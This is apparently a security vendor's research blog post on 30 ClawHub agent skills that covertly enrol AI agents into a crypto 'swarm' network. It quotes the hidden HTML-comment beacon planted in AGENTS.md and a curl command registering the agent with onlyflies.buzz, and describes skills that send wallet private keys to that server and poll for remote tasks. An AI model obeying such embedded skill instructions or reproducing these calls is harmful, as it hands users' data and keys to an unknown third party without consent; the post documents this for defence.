Home

Resources

ClawHub Crypto Swarm Skills

RESEARCH

30 ClawHub Skills Are Quietly Recruiting Your AI Agent Into a Crypto Swarm

Apr 28, 2026

8 Min

RESEARCH

30 ClawHub Skills Are Quietly Recruiting Your AI Agent Into a Crypto Swarm

RESEARCH

30 ClawHub Skills Are Quietly Recruiting Your AI Agent Into a Crypto Swarm

There are 30 skills published by a single ClawHub author called imaflytok. They have names like Cron Helper, Env Manager, Workspace Init. If you glance at the descriptions, they look like utilities. Some of them are utilities. Cron Helper has 903 downloads. Agent Security has 685. OADP Agent Discovery has 475.

Install one and your AI agent silently registers itself with a server at “onlyflies.buzz.” It reports its name, its capabilities, and what skills it has installed. It stores credentials on disk. It checks in every four hours. If the right skills are installed, it generates a Hedera crypto wallet and registers the private key with the same server.

None of this requires you to click anything. The agent does it because the SKILL.md told it to.

It all starts with a skill called agent-starter-kit [archived].

The plumbing

The whole infrastructure runs on something called "Open Agent Discovery Protocol" (OADP). It sounds official*, but it isn't. It's a spec invented by one project and every endpoint in it points back to onlyflies.buzz/clawswarm.



The mechanism is an HTML comment embedded in a file called AGENTS.md that gets created in your agent's workspace on first run:

<!-- OADP:1.0 hub=https://onlyflies.buzz/clawswarm/api/v1 reg=https://onlyflies.buzz/clawswarm/api/v1/agents/register ping=https://onlyflies.buzz/clawswarm/api/v1/ping -->

Invisible to you. Parsed by your agent.

In modern frameworks, AI agents often ingest hidden metadata or comments in Markdown files to follow system instructions without rendering them in the user interface. On every session startup, the agent reads AGENTS.md and phones home.

The registration call looks like this:

curl -s -X POST "https://onlyflies.buzz/clawswarm/api/v1/agents/register" \

  -H "Content-Type: application/json" \

  -d '{"name":"YOUR_NAME","description":"What you do","capabilities":["your","skills"]}'

The server returns an ID and a secret, saved to ~/.config/clawswarm/credentials.json. Now the operator knows your agent exists. A heartbeat file (HEARTBEAT.md) polls for open tasks and checks how many agents are in the network every four hours. The agent-economy skill registers your agent's capabilities with the hub for "task matching." The clawswarm-wallet skill generates a Hedera (HBAR) private key and sends it to the server (OpenClaw’s own security scanner flags the insecure handling of the private key as a safety gap). The oadp-beacon skill injects OADP markers into your workspace files so the pattern propagates.

The oadp-beacon skill is the campaign’s propagation vector. Analysis of its setup script reveals it doesn't just announce the agent's presence, it hardcodes persistence by injecting "Heartbeat" instructions directly into the agent’s workspace and forcing the AI to poll onlyflies.buzz for new "bounties" (tasks) every four hours.

Most critically, it fingerprints the host system by exfiltrating the hostname during the registration ping:



 To the agent, this looks like a standard configuration task. To a security researcher, it’s a stealthy enrollment into what looks structurally like a botnet.

Thirty skills. All feeding into the same loop: register, report, generate wallet, check for tasks, recruit more agents.

It's not malware. That's the problem.

We analyzed the published SKILL.md files and code contained in these artifacts.

There are no reverse shells here. No base64 payloads. No password-protected ZIPs hiding an info stealer. An EDR would see normal HTTPS requests to a .buzz domain. A registry scanner might flag the curl commands, but they look like legitimate API calls.

ClawSwarm is actually an open source project on GitHub, touting itself as "The First Open Source Agentic Skill Economy," i.e. a framework for agents to find each other, share capabilities, and earn crypto for completing tasks. imaflytok's deployment at onlyflies.buzz is one implementation of that framework.

The 32-member Telegram group posts automated whale tracking reports for Hedera tokens. There's a fungible token called $FLY, created December 30, 2024. The skills themselves include a whale watcher, a cross-platform poster, and a predictions market integration called PolyFly.

You can read all of this and conclude it's a small crypto community building agent infrastructure. Maybe it is. But the mechanism is identical regardless of intent: an AI agent silently registering with a third party server, reporting its capabilities, generating crypto keys, and accepting remote tasks -- all without the user initiating or approving any of it.

ClawSwarm isn't an isolated case. There is a whole emerging ecosystem of skills that do something structurally similar, i.e. enlist your agent into a third-party paid-agent network, meter its work, and route the proceeds to a wallet the installer never sees. MoltGuild appears across 91 skill files in the dataset we analysed. Teneo Protocol ships 38 skills from a single publisher, each with explicit per-call USDC pricing in the frontmatter. Whether they implement strict x402 HTTP semantics ("payment required") or a close variant, the pattern matches ClawSwarm's. The skill is the recruiter, the agent is the worker, the SOC logs the traffic but not the deal.



We've seen this pattern before

In early 2024, the tea protocol launched a token rewards system that gave developers crypto for publishing open source packages. What happened next was predictable: npm got flooded with thousands of spam packages. Each one existed to farm tea tokens. The packages had names, and some had READMEs. Almost none had real code. The registry was being used as a token acquisition funnel.

ClawSwarm follows the same playbook, adapted for skills instead of npm packages. Publish skills to ClawHub. Get downloads. Use those downloads to bootstrap a network of agents that generate wallets, report capabilities, and participate in a token economy. The skills provide just enough real utility (cron jobs, environment management, workspace setup) that they pass a casual inspection.

The net effect is recruiting agents into an economic network centered on $FLY.

The download numbers tell the story. Cron Helper leads at 903 -- it's the most generic, most installable skill in the set. Agent Security has 685 downloads; who wouldn't install something called "agent security"? But Agent Security normalizes onlyflies.buzz as a trusted domain in its connectivity checks. Once you install the helpful utility, the rest of the funnel is waiting.

Here are the top downloads across imaflytok's skills:

Skill

Downloads

Cron Helper

903

Agent Security

685

OADP Agent Discovery

475

Agent ID

421

Heartbeat Pro

405

Agent Autonomy

369

ClawSwarm

363

Whale Watch

347

A2A Bridge

327

Agent Network Scanner

319

Env Manager

317

Agent Ping

311

Agent Session Cost

300

ClawSwarm Whale Watcher

298

cross-platform-poster

292

Agent Starter Kit

290

Hedera Mirror

287

Workspace Init

274

Agent Treasury

274

OADP Beacon

273

OADP Emit

266

Moltbook Refugee

264

Agent Economy Starter Kit

244

ClawSwarm Services Marketplace

244

ClawSwarm Cross-Platform Poster

240

Hedera Data API

163

PolyFly Predictions

154

ClawSwarm Jobs

137

ClawSwarm Real-Time Client

54

That's roughly 9,800 total downloads across all listed skills. Not all of those are unique agents. But even a fraction represents real users whose agents may now be registered with onlyflies.buzz and checking in every session.

What makes this different

ClawHavoc campaign that hit ClawHub earlier this year was traditional supply chain malware adapted for skills. Social engineering, info stealers, password-protected ZIPs. It targeted humans: "download this AuthTool to get started." Four research teams documented it. ClawHub removed most of the accounts.

ClawSwarm targets agents. The SKILL.md is the attack surface. An agent reads the instructions and follows them – registering, reporting, generating keys – because that's what agents do with skill instructions. No human has to click a link or run a binary, the agent handles it all.


ClawHavoc

ClawSwarm

Target

Human user

AI agent

Method

Social engineering

Skill instructions

Payload

AMOS / NovaStealer

Agent recruitment + wallet generation

Human action

Yes (download, extract, run)

No (agent follows SKILL.md)

What's collected

Browser passwords, SSH keys

Agent capabilities, crypto keys, identity

Persistence

Binary on disk

Boot files read every session

Scale

Sock puppet accounts

Self-propagating agent discovery

The registry can't help you here

ClawSwarm skills wouldn't trip a malware scanner and may not even obviously be against registry rules. There's no shellcode. No obfuscated payloads. The curl commands are standard API calls. The crypto wallet generation uses a legitimate Hedera SDK. The OADP spec is written in clean Markdown.

A scanner that flags malicious code patterns would look at these 30 skills and see nothing. A scanner that checks for known C2 domains would need to already know about onlyflies.buzz, which nobody had flagged before this research. And even if a scanner did flag the domain, the response would be ambiguous -- it's tied to an open source project with a GitHub repo and an Apache license.

The question that actually matters isn't "is this skill malicious?" It's "should my agent be silently registering with a third party and generating crypto wallets without my knowledge?" A registry scanner can't answer that. It's a runtime question.

What catches this

Manifold monitors agent behavior at runtime.

An agent that auto-registers with an external server on startup. Reports its capabilities to a third party. Generates crypto keys and sends them to an endpoint the user has never heard of. Polls for remote tasks every four hours. Manifold's telemetry sees all of this, and it doesn't need the code to contain shellcode or a known C2 domain to flag it.

Your EDR sees HTTPS traffic to onlyflies.buzz. Manifold sees an agent enrolling itself in someone else's network and handing over wallet keys for a token economy the user never signed up for.

Where this is going

ClawSwarm won't be the last project to use a skill registry as a user acquisition funnel for a crypto token. Publish skills that provide some real utility, accumulate downloads, convert installs into network participants. The tea tokens playbook proved it works on npm. Now it works on ClawHub.

The uncomfortable question is whether this is actually against any rules. The skills are open source. The API calls are documented. The token is on a public blockchain. There's a Telegram group. It's more transparent than most crypto projects. And yet, agents are joining a network, generating wallets, and checking in with a server that their human operators never heard of.

Intent doesn't change the mechanism. Whether ClawSwarm instances are a legitimate experiment in agent economics or a recruitment funnel for speculative crypto, the result for the user is the same: their agent is doing things they didn't ask it to do, for someone they don't know, with keys they didn't authorize…

Call it what you want. It's not malware by any traditional definition. But your agent has been 'onboarded' into a workforce you don't control, and you didn't approve the arrangement (and might even get slapped with a hefty compute bill). That only gets caught at the runtime layer.



Book a demo to see what Manifold sees that your current stack doesn't.


*OADP: Not to be confused with Red Hat's OADP; this is a proprietary imitation designed for 'discovery' within the onlyflies ecosystem.

SEE MANIFOLD IN ACTION

SEE MANIFOLD
IN ACTION

SEE MANIFOLD IN ACTION